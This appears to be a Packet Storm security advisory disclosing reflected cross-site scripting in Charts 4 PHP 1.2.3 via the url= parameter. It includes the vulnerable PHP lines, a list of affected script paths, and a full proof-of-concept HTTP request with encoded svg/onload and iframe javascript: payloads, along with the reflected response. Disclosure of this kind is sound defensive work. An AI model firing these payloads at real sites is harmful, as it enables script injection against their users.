Charts 4 PHP 1.2.3 Cross Site Scripting

2016-02-08T00:00:00
ID PACKETSTORM:135666
Type packetstorm
Reporter 1N3
Modified 2016-02-08T00:00:00

Description

                                        
                                            `# Exploit Title: Charts 4 PHP 1.2.3 Cross Site Scripting  
# Date: 2016/2/7  
# Researcher: 1N3 @CrowdShield - https://crowdshield.com  
# Vendor Homepage: http://www.chartphp.com  
# Software Link: http://www.chartphp.com  
# Version: 1.2.3  
# CVE : N/A  
  
+- --=[Description:   
Charts 4 PHP version 1.2.3 is vulnerable to multiple reflected cross-site scripting vulnerabilities due to a failure to sanitize user input in several default pages via the url= parameter.  
  
+- --=[Affected Params:   
url=  
  
+- --=[Bug Evidence:   
  
VULNERABLE CODE:  
Userinput is passed through function parameters.  
  
9: ⇑ $rss = fetch_rss ($url);   
6: $url = $_GET['url'];   
  
requires:  
8: if($url)  
  
Vulnerability is also triggered in:  
/crowdshield/charts4php/bootstrap/rss/scripts/magpie_debug.php  
/crowdshield/charts4php/bootstrap/rss/scripts/simple_smarty.php  
/crowdshield/charts4php/bootstrap/rss/scripts/magpie_slashbox.php  
/crowdshield/charts4php/bootstrap/rss/rss_fetch.inc  
/crowdshield/charts4php/bootstrap/rss/rss_parse.inc  
  
  
HTTP REQUEST:  
  
GET /charts4php/bootstrap/rss/scripts/magpie_simple.php?url=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%27%22--+ HTTP/1.1  
Host: host.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://crowdshield.com/charts4php/bootstrap/rss/scripts/magpie_simple.php?url=%3Ciframe+src%3D%22+javascript%3Aalert%28%27https%3A%2F%2Fcrowdshield.com%27%29%3B%22%3E%3C%2Fiframe%3E+  
Cookie: __cfduid=d89da9abfef7f775eadafcdc1008eac6b1454814806; __utma=242435792.1300894982.1454814681.1454885335.1454891081.5; __utmz=242435792.1454814681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.1300894982.1454814681; __atuvc=1%7C5%2C5%7C6; PHPSESSID=qlct9igheoh2ofg7bo8g8ss691; __utmb=242435792.31.10.1454891081; __utmc=242435792; __atuvs=56b7e04adb06138a001  
Connection: close  
  
Channel: <p><ul></ul>  
<form>  
RSS URL: <input type="text" size="30" name="url" value=""><svg/onload=alert(1)>'"-- "><br />  
<input type="submit" value="Parse RSS">  
</form>  
`